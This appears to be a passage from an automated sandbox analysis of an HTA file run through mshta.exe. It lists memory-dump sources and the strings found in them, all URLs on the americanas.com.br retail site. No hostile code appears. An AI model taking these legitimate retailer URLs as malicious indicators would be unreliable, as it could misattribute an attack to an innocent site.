Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/oreo?chave=pc_home_ads_oreo-wandinha_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/pepsico-elma-chips?chave=pm_tt_acom_biscoitos_pepsico-o2o_nov_
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744022226.0000000006E98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/politica-de-privacidade?chave=dk_hm_ft_00_05_privacidade
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/politica-de-privacidade?chave=dk_hm_ft_00_05_privacidadeR
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/premio?chave=dk_hm_ft_00_02_premios
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/regras-do-site?chave=dk_hm_ft_00_06_regras
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670092360.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicos
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752639169.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770941763.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prf_hm_0_tt_8_
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776626901.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prfm_mn_ss_22_a
Source: mshta.exe, mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743961553.00000000092B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/seguro-celular-roubo-furto?chave=pfm_hm_tt_1_0_seguro
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C28F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655302428.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termos
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top-
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_eletroportateis_topcategori
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top-categorias?chave=pm_hm_mn_acom_informatica_topcategorias
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/top9
